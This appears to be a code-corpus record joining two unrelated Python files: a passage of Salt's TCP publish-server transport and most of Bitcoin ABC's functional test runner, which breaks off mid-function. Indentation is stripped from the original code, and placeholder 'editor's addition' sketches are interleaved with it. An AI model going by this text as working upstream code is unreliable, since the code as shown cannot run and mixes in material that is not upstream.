if self._read_until_future is not None and self._read_until_future.done():
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
self._read_until_future.exception()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
class PubServer(tornado.tcpserver.TCPServer, object):
'''
TCP publisher
'''
def __init__(self, opts, io_loop=None):
super(PubServer, self).__init__(ssl_options=opts.get('ssl'))
self.io_loop = io_loop
self.opts = opts
self._closing = False
self.clients = set()
self.aes_funcs = salt.master.AESFuncs(self.opts)
self.present = {}
self.presence_events = False
if self.opts.get('presence_events', False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != 'tcp':
tcp_only = False
if tcp_only:
# Only when the transport is TCP only, the presence events will
# be handled here. Otherwise, it will be handled in the
# 'Maintenance' process.
self.presence_events = True
if self.presence_events:
self.event = salt.utils.event.get_event(
'master',
opts=self.opts,
listen=False
)
def close(self):
if self._closing:
return
self._closing = True
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _add_client_present(self, client):
id_ = client.id_
if id_ in self.present:
clients = self.present[id_]
clients.add(client)
else:
self.present[id_] = {client}
if self.presence_events:
data = {'new': [id_],
'lost': []}
self.event.fire_event(
data,
salt.utils.event.tagify('change', 'presence')
)
data = {'present': list(self.present.keys())}
self.event.fire_event(
data,
salt.utils.event.tagify('present', 'presence')
)
def _remove_client_present(self, client):
id_ = client.id_
if id_ is None or id_ not in self.present:
# This is possible if _remove_client_present() is invoked
# before the minion's id is validated.
return
clients = self.present[id_]
if client not in clients:
# Since _remove_client_present() is potentially called from
# _stream_read() and/or publish_payload(), it is possible for
# it to be called twice, in which case we will get here.
# This is not an abnormal case, so no logging is required.
return
clients.remove(client)
if len(clients) == 0:
del self.present[id_]
if self.presence_events:
data = {'new': [],
'lost': [id_]}
self.event.fire_event(
data,
salt.utils.event.tagify('change', 'presence')
)
data = {'present': list(self.present.keys())}
self.event.fire_event(
data,
salt.utils.event.tagify('present', 'presence')
)
@tornado.gen.coroutine
def _stream_read(self, client):
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
client._read_until_future = client.stream.read_bytes(4096, partial=True)
wire_bytes = yield client._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
body = framed_msg['body']
if body['enc'] != 'aes':
# We only accept 'aes' encoded messages for 'id'
continue
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
load = crypticle.loads(body['load'])
if six.PY3:
load = salt.transport.frame.decode_embedded_strs(load)
if not self.aes_funcs.verify_minion(load['id'], load['tok']):
continue
client.id_ = load['id']
self._add_client_present(client)
except tornado.iostream.StreamClosedError as e:
log.debug('tcp stream to %s closed, unable to recv', client.address)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
break
except Exception as e:
log.error('Exception parsing response', exc_info=True)
continue
def handle_stream(self, stream, address):
log.trace('Subscriber at %s connected', address)
client = Subscriber(stream, address)
self.clients.add(client)
self.io_loop.spawn_callback(self._stream_read, client)
# TODO: ACK the publish through IPC
@tornado.gen.coroutine
def publish_payload(self, package, _):
log.debug('TCP PubServer sending payload: %s', package)
payload = salt.transport.frame.frame_msg(package['payload'])
to_remove = []
if 'topic_lst' in package:
topic_lst = package['topic_lst']
for topic in topic_lst:
if topic in self.present:
# This will rarely be a list of more than 1 item. It will
# be more than 1 item if the minion disconnects from the
# master in an unclean manner (e.g. a cable yank), then
# restarts and the master is yet to detect the disconnect
# via TCP keep-alive.
for client in self.present[topic]:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except tornado.iostream.StreamClosedError:
to_remove.append(client)
else:
log.debug('Publish target %s not connected', topic)
else:
for client in self.clients:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except tornado.iostream.StreamClosedError:
to_remove.append(client)
for client in to_remove:
log.debug('Subscriber at %s has disconnected from publisher', client.address)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
log.trace('TCP PubServer finished publishing payload')
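# --- Hedged sketch (editor's addition) ---
# Shape of the 'package' dict that publish_payload() consumes. It arrives over
# the pull IPC socket from TCPPubServerChannel.publish(); the values below are
# placeholders. 'topic_lst' is optional and, when present, restricts delivery
# to the listed minion ids instead of broadcasting to every subscriber.
_EXAMPLE_PUBLISH_PACKAGE = {
    'payload': b'<serialized {"enc": "aes", "load": ..., "sig": ...}>',
    'topic_lst': ['minion01', 'minion02'],
}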
class TCPPubServerChannel(salt.transport.server.PubServerChannel):
# TODO: opts!
# Based on default used in tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(opts)
self.io_loop = None
def __setstate__(self, state):
salt.master.SMaster.secrets = state['secrets']
self.__init__(state['opts'])
def __getstate__(self):
return {'opts': self.opts,
'secrets': salt.master.SMaster.secrets}
def _publish_daemon(self, **kwargs):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
log_queue = kwargs.get('log_queue')
if log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
log_queue_level = kwargs.get('log_queue_level')
if log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(log_queue_level)
salt.log.setup.setup_multiprocessing_logging(log_queue)
# Check if io_loop was set outside
if self.io_loop is None:
self.io_loop = tornado.ioloop.IOLoop.current()
# Spin up the publisher
pub_server = PubServer(self.opts, io_loop=self.io_loop)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(sock, self.opts)
sock.setblocking(0)
sock.bind((self.opts['interface'], int(self.opts['publish_port'])))
sock.listen(self.backlog)
# pub_server will take ownership of the socket
pub_server.add_socket(sock)
# Set up Salt IPC server
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = int(self.opts.get('tcp_master_publish_pull', 4514))
else:
pull_uri = os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
pull_sock = salt.transport.ipc.IPCMessageServer(
pull_uri,
io_loop=self.io_loop,
payload_handler=pub_server.publish_payload,
)
# Securely create socket
log.info('Starting the Salt Puller on %s', pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.start()
# run forever
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
salt.log.setup.shutdown_multiprocessing_logging()
def pre_fork(self, process_manager, kwargs=None):
'''
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
'''
process_manager.add_process(self._publish_daemon, kwargs=kwargs)
def publish(self, load):
'''
Publish "load" to minions
'''
payload = {'enc': 'aes'}
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
payload['load'] = crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
# Use the Salt IPC server
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = int(self.opts.get('tcp_master_publish_pull', 4514))
else:
pull_uri = os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
# TODO: switch to the actual asynchronous interface
#pub_sock = salt.transport.ipc.IPCMessageClient(self.opts, io_loop=self.io_loop)
pub_sock = salt.utils.asynchronous.SyncWrapper(
salt.transport.ipc.IPCMessageClient,
(pull_uri,)
)
pub_sock.connect()
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list' and not self.opts.get("order_masters", False):
if isinstance(load['tgt'], six.string_types):
# Fetch a list of minions that match
_res = self.ckminions.check_minions(load['tgt'],
tgt_type=load['tgt_type'])
match_ids = _res['minions']
log.debug("Publish Side Match: %s", match_ids)
# Send the list of minions through so the transport can target them
int_payload['topic_lst'] = match_ids
else:
int_payload['topic_lst'] = load['tgt']
# Send it over IPC!
pub_sock.send(int_payload)
|
test_runner.py
|
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Copyright (c) 2017 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run regression test suite.
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts.
Functional tests are disabled on Windows by default. Use --force to run them anyway.
For a description of arguments recognized by test scripts, see
`test/functional/test_framework/test_framework.py:BitcoinTestFramework.main`.
"""
import argparse
from collections import deque
import configparser
import datetime
import os
import time
import shutil
import sys
import subprocess
import tempfile
import re
import logging
import xml.etree.ElementTree as ET
import json
import threading
import multiprocessing
from queue import Queue, Empty
# Formatting. Default colors to empty strings.
BOLD, BLUE, RED, GREY = ("", ""), ("", ""), ("", ""), ("", "")
try:
# Make sure python thinks it can write unicode to its stdout
"\u2713".encode("utf_8").decode(sys.stdout.encoding)
TICK = "✓ "
CROSS = "✖ "
CIRCLE = "○ "
except UnicodeDecodeError:
TICK = "P "
CROSS = "x "
CIRCLE = "o "
if os.name == 'posix':
# primitive formatting on supported
# terminal via ANSI escape sequences:
BOLD = ('\033[0m', '\033[1m')
BLUE = ('\033[0m', '\033[0;34m')
RED = ('\033[0m', '\033[0;31m')
GREY = ('\033[0m', '\033[1;30m')
TEST_EXIT_PASSED = 0
TEST_EXIT_SKIPPED = 77
NON_SCRIPTS = [
# These are python files that live in the functional tests directory, but are not test scripts.
"combine_logs.py",
"create_cache.py",
"test_runner.py",
]
TEST_PARAMS = {
# Some test can be run with additional parameters.
# When a test is listed here, it will be run without parameters
# as well as with additional parameters listed here.
# This:
# example "testName" : [["--param1", "--param2"] , ["--param3"]]
# will run the test 3 times:
# testName
# testName --param1 --param2
# testName --param3
"wallet_txn_doublespend.py": [["--mineblock"]],
"wallet_txn_clone.py": [["--mineblock"]],
"wallet_multiwallet.py": [["--usecli"]],
"wallet_disableprivatekeys.py": [["--usecli"]],
}
# Used to limit the number of tests, when list of tests is not provided on command line
# When --extended is specified, we run all tests, otherwise
# we only run a test if its execution time in seconds does not exceed EXTENDED_CUTOFF
DEFAULT_EXTENDED_CUTOFF = 40
DEFAULT_JOBS = (multiprocessing.cpu_count() // 3) + 1
class TestCase():
"""
Data structure to hold and run information necessary to launch a test case.
"""
def __init__(self, test_num, test_case, tests_dir, tmpdir, flags=None):
self.tests_dir = tests_dir
self.tmpdir = tmpdir
self.test_case = test_case
self.test_num = test_num
self.flags = flags
def run(self, portseed_offset):
t = self.test_case
portseed = self.test_num + portseed_offset
portseed_arg = ["--portseed={}".format(portseed)]
log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16)
log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16)
test_argv = t.split()
testdir = os.path.join("{}", "{}_{}").format(
self.tmpdir, re.sub(".py$", "", test_argv[0]), portseed)
tmpdir_arg = ["--tmpdir={}".format(testdir)]
name = t
time0 = time.time()
process = subprocess.Popen([sys.executable, os.path.join(self.tests_dir, test_argv[0])] + test_argv[1:] + self.flags + portseed_arg + tmpdir_arg,
universal_newlines=True,
stdout=log_stdout,
stderr=log_stderr)
process.wait()
log_stdout.seek(0), log_stderr.seek(0)
[stdout, stderr] = [l.read().decode('utf-8')
for l in (log_stdout, log_stderr)]
log_stdout.close(), log_stderr.close()
if process.returncode == TEST_EXIT_PASSED and stderr == "":
status = "Passed"
elif process.returncode == TEST_EXIT_SKIPPED:
status = "Skipped"
else:
status = "Failed"
return TestResult(self.test_num, name, testdir, status, int(time.time() - time0), stdout, stderr)
def on_ci():
return os.getenv('TRAVIS') == 'true' or os.getenv('TEAMCITY_VERSION') is not None
def main():
# Read config generated by configure.
config = configparser.ConfigParser()
configfile = os.path.join(os.path.abspath(
os.path.dirname(__file__)), "..", "config.ini")
config.read_file(open(configfile, encoding="utf8"))
src_dir = config["environment"]["SRCDIR"]
build_dir = config["environment"]["BUILDDIR"]
tests_dir = os.path.join(src_dir, 'test', 'functional')
# Parse arguments and pass through unrecognised args
parser = argparse.ArgumentParser(add_help=False,
usage='%(prog)s [test_runner.py options] [script options] [scripts]',
description=__doc__,
epilog='''
Help text and arguments for individual test script:''',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--combinedlogslen', '-c', type=int, default=0,
help='print a combined log (of length n lines) from all test nodes and test framework to the console on failure.')
parser.add_argument('--coverage', action='store_true',
help='generate a basic coverage report for the RPC interface')
parser.add_argument(
'--exclude', '-x', help='specify a comma-separated-list of scripts to exclude.')
parser.add_argument('--extended', action='store_true',
help='run the extended test suite in addition to the basic tests')
parser.add_argument('--cutoff', type=int, default=DEFAULT_EXTENDED_CUTOFF,
help='set the cutoff runtime for what tests get run')
parser.add_argument('--force', '-f', action='store_true',
help='run tests even on platforms where they are disabled by default (e.g. windows).')
parser.add_argument('--help', '-h', '-?',
action='store_true', help='print help text and exit')
parser.add_argument('--jobs', '-j', type=int, default=DEFAULT_JOBS,
help='how many test scripts to run in parallel.')
parser.add_argument('--keepcache', '-k', action='store_true',
help='the default behavior is to flush the cache directory on startup. --keepcache retains the cache from the previous testrun.')
parser.add_argument('--quiet', '-q', action='store_true',
help='only print results summary and failure logs')
parser.add_argument('--tmpdirprefix', '-t',
default=tempfile.gettempdir(), help="Root directory for datadirs")
parser.add_argument('--junitoutput', '-J',
default=os.path.join(build_dir, 'junit_results.xml'), help="file that will store JUnit formatted test results.")
args, unknown_args = parser.parse_known_args()
# args to be passed on always start with two dashes; tests are the
# remaining unknown args
tests = [arg for arg in unknown_args if arg[:2] != "--"]
passon_args = [arg for arg in unknown_args if arg[:2] == "--"]
passon_args.append("--configfile={}".format(configfile))
# Set up logging
logging_level = logging.INFO if args.quiet else logging.DEBUG
logging.basicConfig(format='%(message)s', level=logging_level)
# Create base test directory
tmpdir = os.path.join("{}", "bitcoin_test_runner_{:%Y%m%d_%H%M%S}").format(
args.tmpdirprefix, datetime.datetime.now())
os.makedirs(tmpdir)
logging.debug("Temporary test directory at {}".format(tmpdir))
enable_wallet = config["components"].getboolean("ENABLE_WALLET")
enable_utils = config["components"].getboolean("ENABLE_UTILS")
enable_bitcoind = config["components"].getboolean("ENABLE_BITCOIND")
if config["environment"]["EXEEXT"] == ".exe" and not args.force:
# https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
# https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
print(
"Tests currently disabled on Windows by default. Use --force option to enable")
sys.exit(0)
if not (enable_wallet and enable_utils and enable_bitcoind):
print(
"No functional tests to run. Wallet, utils, and bitcoind must all be enabled")
print(
"Rerun `configure` with -enable-wallet, -with-utils and -with-daemon and rerun make")
sys.exit(0)
# Build list of tests
all_scripts = get_all_scripts_from_disk(tests_dir, NON_SCRIPTS)
# Check all tests with parameters actually exist
for test in TEST_PARAMS:
if test not in all_scripts:
print("ERROR: Test with parameter {} does not exist, check it has "
"not been renamed or deleted".format(test))
sys.exit(1)
if tests:
# Individual tests have been specified. Run specified tests that exist
# in the all_scripts list. Accept the name with or without .py
# extension.
individual_tests = [
re.sub(r"\.py$", "", t) + ".py" for t in tests if not t.endswith('*')]
test_list = []
for t in individual_tests:
if t in all_scripts:
test_list.append(t)
else:
print("{}WARNING!{} Test '{}' not found in full test list.".format(
BOLD[1], BOLD[0], t))
# Allow for wildcard at the end of the name, so a single input can
# match multiple tests
for test in tests:
if test.endswith('*'):
test_list.extend(
[t for t in all_scripts if t.startswith(test[:-1])])
# do not cut off explicitly specified tests
cutoff = sys.maxsize
else:
# No individual tests have been specified.
# Run all tests that do not exceed
test_list = all_scripts
cutoff = args.cutoff
if args.extended:
cutoff = sys.maxsize
# Remove the test cases that the user has explicitly asked to exclude.
if args.exclude:
tests_excl = [re.sub(r"\.py$", "", t) +
".py" for t in args.exclude.split(',')]
for exclude_test in tests_excl:
if exclude_test in test_list:
test_list.remove(exclude_test)
else:
print("{}WARNING!{} Test '{}' not found in current test list.".format(
BOLD[1], BOLD[0], exclude_test))
# Update timings from build_dir only if separate build directory is used.
# We do not want to pollute source directory.
build_timings = None
if (src_dir != build_dir):
build_timings = Timings(os.path.join(build_dir, 'timing.json'))
# Always use timings from src_dir if present
src_timings = Timings(os.path.join(
src_dir, "test", "functional", 'timing.json'))
# Add test parameters and remove long running tests if needed
test_list = get_tests_to_run(
test_list, TEST_PARAMS, cutoff, src_timings)
if not test_list:
print("No valid test scripts specified. Check that your test is in one "
"of the test lists in test_runner.py, or run test_runner.py with no arguments to run all tests")
sys.exit(0)
if args.help:
# Print help for test_runner.py, then print help of the first script
# and exit.
parser.print_help()
subprocess.check_call(
[sys.executable, os.path.join(tests_dir, test_list[0]), '-h'])
sys.exit(0)
if not args.keepcache:
shutil.rmtree(os.path.join(build_dir, "test",
"cache"), ignore_errors=True)
run_tests(test_list, build_dir, tests_dir, args.junitoutput,
tmpdir, args.jobs, args.coverage, passon_args, args.combinedlogslen, build_timings)
def run_tests(test_list, build_dir, tests_dir, junitoutput, tmpdir, num_jobs, enable_coverage=False, args=[], combined_logs_len=0, build_timings=None):
# Warn if bitcoind is already running (unix only)
try:
pidofOutput = subprocess.check_output(["pidof", "bitcoind"])
if pidofOutput is not None and pidofOutput != b'':
print("{}WARNING!{} There is already a bitcoind process running on this system. Tests may fail unexpectedly due to resource contention!".format(
BOLD[1], BOLD[0]))
except (OSError, subprocess.SubprocessError):
pass
# Warn if there is a cache directory
cache_dir = os.path.join(build_dir, "test", "cache")
if os.path.isdir(cache_dir):
print("{}WARNING!{} There is a cache directory here: {}. If tests fail unexpectedly, try deleting the cache directory.".format(
BOLD[1], BOLD[0], cache_dir))
flags = ['--cachedir={}'.format(cache_dir)] + args
if enable_coverage:
coverage = RPCCoverage()
flags.append(coverage.flag)
logging.debug(
"Initializing coverage directory at {}".format(coverage.dir))
else:
coverage = None
if len(test_list) > 1 and num_jobs > 1:
# Populate cache
try:
subprocess.check_output([sys.executable, os.path.join(
tests_dir, 'create_cache.py')] + flags + [os.path.join("--tmpdir={}", "cache") .format(tmpdir)])
except subprocess.CalledProcessError as e:
sys.stdout.buffer.write(e.output)
raise
# Run Tests
time0 = time.time()
test_results = execute_test_processes(
num_jobs, test_list, tests_dir, tmpdir, flags)
runtime = int(time.time() - time0)
max_len_name = len(max(test_list, key=len))
print_results(test_results, tests_dir, max_len_name,
runtime, combined_logs_len)
save_results_as_junit(test_results, junitoutput, runtime)
if (build_timings is not None):
build_timings.save_timings(test_results)
if coverage:
coverage.report_rpc_coverage()
logging.debug("Cleaning up coverage data")
coverage.cleanup()
# Clear up the temp directory if all subdirectories are gone
if not os.listdir(tmpdir):
os.rmdir(tmpdir)
all_passed = all(
map(lambda test_result: test_result.was_successful, test_results))
sys.exit(not all_passed)
def execute_test_processes(num_jobs, test_list, tests_dir, tmpdir, flags):
update_queue = Queue()
job_queue = Queue()
test_results = []
poll_timeout = 10 # seconds
# In case there is a graveyard of zombie bitcoinds, we can apply a
# pseudorandom offset to hopefully jump over them.
# (625 is PORT_RANGE/MAX_NODES)
portseed_offset = int(time.time() * 1000) % 625
##
# Define some helper functions we will need for threading.
##
def handle_message(message, running_jobs):
"""
handle_message handles a single message from handle_test_cases
"""
if isinstance(message, TestCase):
running_jobs.append((message.test_num, message.test_case))
print("{}{}{} started".format(BOLD[1], message.test_case, BOLD[0]))
return
if isinstance(message, TestResult):
test_result = message
running_jobs.remove((test_result.num, test_result.name))
test_results.append(test_result)
if test_result.status == "Passed":
print("{}{}{} passed, Duration: {} s".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
elif test_result.status == "Skipped":
print("{}{}{} skipped".format(
BOLD[1], test_result.name, BOLD[0]))
else:
print("{}{}{} failed, Duration: {} s\n".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
print(BOLD[1] + 'stdout:' + BOLD[0])
print(test_result.stdout)
print(BOLD[1] + 'stderr:' + BOLD[0])
print(test_result.stderr)
return
assert False, "we should not be here"
def handle_update_messages():
"""
handle_update_messages waits for messages to be sent from handle_test_cases via the
update_queue. It serializes the results so we can print nice status update messages.
"""
printed_status = False
running_jobs = []
while True:
message = None
try:
message = update_queue.get(True, poll_timeout)
if message is None:
break
# We printed a status message, need to kick to the next line
# before printing more.
if printed_status:
print()
printed_status = False
handle_message(message, running_jobs)
update_queue.task_done()
except Empty:
if not on_ci():
print("Running jobs: {}".format(", ".join([j[1] for j in running_jobs])), end="\r")
sys.stdout.flush()
printed_status = True
def handle_test_cases():
"""
handle_test_cases represents a single thread that is part of a worker pool.
It waits for a test, then executes that test.
It also reports start and result messages to handle_update_messages
"""
while True:
test = job_queue.get()
if test is None:
break
# Signal that the test is starting to inform the poor waiting
# programmer
update_queue.put(test)
result = test.run(portseed_offset)
update_queue.put(result)
job_queue.task_done()
##
# Setup our threads, and start sending tasks
##
# Start our result collection thread.
t = threading.Thread(target=handle_update_messages)
t.daemon = True
t.start()
# Start some worker threads
for j in range(num_jobs):
t = threading.Thread(target=handle_test_cases)
t.daemon = True
t.start()
# Push all our test cases into the job queue.
for i, t in enumerate(test_list):
job_queue.put(TestCase(i, t, tests_dir, tmpdir, flags))
# Wait for all the jobs to be completed
job_queue.join()
# Wait for all the results to be compiled
update_queue.join()
# Flush our queues so the threads exit
update_queue.put(None)
for j in range(num_jobs):
job_queue.put(None)
return test_results
def print_results(test_results, tests_dir, max_len_name, runtime, combined_logs_len):
results = "\n" + BOLD[1] + "{} | {} | {}\n\n".format(
"TEST".ljust(max_len_name), "STATUS ", "DURATION") + BOLD[0]
test_results.sort(key=TestResult.sort_key)
all_passed = True
time_sum = 0
for test_result in test_results:
all_passed = all_passed and test_result.was_successful
time_sum += test_result.time
test_result.padding = max_len_name
results += str(test_result)
testdir = test_result.testdir
if combined_logs_len and os.path.isdir(testdir):
# Print the final `combinedlogslen` lines of the combined logs
print('{}Combine the logs and print the last {} lines ...{}'.format(
BOLD[1], combined_logs_len, BOLD[0]))
print('\n============')
print('{}Combined log for {}:{}'.format(BOLD[1], testdir, BOLD[0]))
print('============\n')
combined_logs, _ = subprocess.Popen([sys.executable, os.path.join(
tests_dir, 'combine_logs.py'), '-c', testdir], universal_newlines=True, stdout=subprocess.PIPE).communicate()
print("\n".join(deque(combined_logs.splitlines(), combined_logs_len)))
status = TICK + "Passed" if all_passed else CROSS + "Failed"
if not all_passed:
results += RED[1]
results += BOLD[1] + "\n{} | {} | {} s (accumulated) \n".format(
"ALL".ljust(max_len_name), status.ljust(9), time_sum) + BOLD[0]
if not all_passed:
results += RED[0]
results += "Runtime: {} s\n".format(runtime)
print(results)
class TestResult():
"""
Simple data structure to store test result values and print them properly
"""
def __init__(self, num, name, testdir, status, time, stdout, stderr):
self.num = num
self.name = name
self.testdir = testdir
self.status = status
self.time = time
self.padding = 0
self.stdout = stdout
self.stderr = stderr
def sort_key(self):
if self.status == "Passed":
return 0, self.name.lower()
elif self.status == "Failed":
return 2, self.name.lower()
elif self.status == "Skipped":
return 1, self.name.lower()
def __repr__(self):
if self.status == "Passed":
color = BLUE
glyph = TICK
elif self.status == "Failed":
color = RED
glyph = CROSS
elif self.status == "Skipped":
color = GREY
glyph = CIRCLE
return color[1] + "{} | {}{} | {} s\n".format(
self.name.ljust(self.padding), glyph, self.status.ljust(7), self.time) + color[0]
@property
def was_successful(self):
return self.status != "Failed"
def get_all_scripts_from_disk(test_dir, non_scripts):
"""
Return all available test scripts from the script directory (excluding NON_SCRIPTS)
"""
python_files = set([t for t in os.listdir(test_dir) if t[-3:] == ".py"])
return list(python_files - set(non_scripts))
def get_tests_to_run(test_list, test_params, cutoff, src_timings):
"""
Return only tests that will not run longer than the cutoff.
Long running tests are returned first to favor running tests in parallel.
Timings from the build directory override those from the src directory.
"""
def get_test_time(test):
# Return 0 if test is unknown to always run it
return next(
(x['time'] for x in src_timings.existing_timings if x['name'] == test), 0)
# Some tests must also be run with additional parameters. Add them to the list.
tests_with_params = []
for test_name in test_list:
# always execute a test without parameters
tests_with_params.append(test_name)
params = test_params.get(test_name)
if params is not None:
tests_with_params.extend(
[test_name + " " + " ".join(p) for p in params])
result = [t for t in tests_with_params if get_test_time(t) <= cutoff]
result.sort(key=lambda x: (-get_test_time(x), x))
return result
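# --- Hedged usage sketch (editor's addition) ---
# Illustrates how get_tests_to_run() expands TEST_PARAMS entries and filters by
# the cutoff. The stub timings object below is a placeholder; the real runner
# passes a Timings instance loaded from timing.json.
def _example_get_tests_to_run():
    class _StubTimings:
        existing_timings = [
            {'name': 'wallet_txn_clone.py', 'time': 10},
            {'name': 'feature_pruning.py', 'time': 120},
        ]

    selected = get_tests_to_run(
        test_list=['wallet_txn_clone.py', 'feature_pruning.py'],
        test_params={'wallet_txn_clone.py': [['--mineblock']]},
        cutoff=40,
        src_timings=_StubTimings(),
    )
    # feature_pruning.py (120 s > cutoff) is dropped; the wallet test is kept
    # twice, once bare and once with --mineblock, sorted longest-first.
    return selected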
class RPCCoverage():
"""
Coverage reporting utilities for test_runner.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `bitcoin-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: test/functional/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir={}'.format(self.dir)
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - {}\n".format(i)) for i in sorted(uncovered)))
else:
print("All RPC commands covered.")
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
# This is shared from `test/functional/test_framework/coverage.py`
reference_filename = 'rpc_interface.txt'
coverage_file_prefix = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, reference_filename)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r', encoding="utf8") as f:
all_cmds.update([i.strip() for i in f.readlines()])
for root, dirs, files in os.walk(self.dir):
for filename in files:
if filename.startswith(coverage_file_prefix):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r', encoding="utf8") as f:
covered_cmds.update([i.strip() for i in f.readlines()])
return all_cmds - covered_cmds
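# --- Hedged usage sketch (editor's addition) ---
# Mimics what the test framework does during a run: write the rpc_interface.txt
# reference plus one 'coverage.*' file into the coverage directory, then diff
# them. The command names are illustrative only.
def _example_rpc_coverage():
    cov = RPCCoverage()
    with open(os.path.join(cov.dir, 'rpc_interface.txt'), 'w', encoding='utf8') as f:
        f.write('getblockcount\ngetbestblockhash\nstop\n')
    with open(os.path.join(cov.dir, 'coverage.node0'), 'w', encoding='utf8') as f:
        f.write('getblockcount\n')
    uncovered = cov._get_uncovered_rpc_commands()  # -> {'getbestblockhash', 'stop'}
    cov.cleanup()
    return uncovered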
def save_results_as_junit(test_results, file_name, time):
"""
Save test results to a file in JUnit format
See http://llg.cubic.org/docs/junit/ for specification of format
"""
e_test_suite = ET.Element("testsuite",
{"name": "bitcoin_abc_tests",
"tests": str(len(test_results)),
# "errors":
"failures": str(len([t for t in test_results if t.status == "Failed"])),
"id": "0",
"skipped": str(len([t for t in test_results if t.status == "Skipped"])),
"time": str(time),
"timestamp": datetime.datetime.now().isoformat('T')
})
for test_result in test_results:
e_test_case = ET.SubElement(e_test_suite, "testcase",
{"name": test_result.name,
"classname": test_result.name,
"time": str(test_result.time)
}
)
if test_result.status == "Skipped":
ET.SubElement(e_test_case, "skipped")
elif test_result.status == "Failed":
ET.SubElement(e_test_case, "failure")
# no special element for passed tests
ET.SubElement(e_test_case, "system-out").text = test_result.stdout
ET.SubElement(e_test_case, "system-err").text = test_result.stderr
ET.ElementTree(e_test_suite).write(
file_name, "UTF-8", xml_declaration=True)
class Timings():
"""
Takes care of loading, merging and saving tests execution times.
"""
def __init__(self, timing_file):
self.timing_file = timing_file
self.existing_timings = self.load_timings()
def load_timings(self):
if os.path.isfile(self.timing_file):
with open(self.timing_file, encoding="utf8") as f:
return json.load(f)
else:
return []
def get_merged_timings(self, new_timings):
"""
Return new list containing existing timings updated with new timings
Tests that do not exist are not removed
"""
key = 'name'
merged = {}
for item in self.existing_timings + new_timings:
if item[key] in merged:
merged[item[key]].update(item)
else:
merged[item[key]] = item
# Sort the result to preserve test ordering in file
merged = list(merged.values())
merged.sort(key=lambda t, key=key: t[key])
return merged
def save_timings(self, test_results):
# we only save tests that have passed - timings for failed tests might be
# wrong (timeouts or early fails)
passed_results = [t for t in test_results if t.status == 'Passed']
new_timings = list(map(lambda t: {'name': t.name, 'time': t.time},
passed_results))
merged_timings = self.get_merged_timings(new_timings)
with open(self.timing_file, 'w', encoding="utf8") as f:
json.dump(merged_timings, f, indent=True)
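# --- Hedged usage sketch (editor's addition) ---
# Demonstrates the merge semantics of Timings.get_merged_timings(): entries are
# keyed by 'name', new timings overwrite matching old ones, tests without new
# timings are kept, and the result is re-sorted by name. The path is a
# placeholder.
def _example_merge_timings():
    timings = Timings('/tmp/example_timing.json')  # hypothetical file
    timings.existing_timings = [
        {'name': 'a.py', 'time': 5},
        {'name': 'b.py', 'time': 9},
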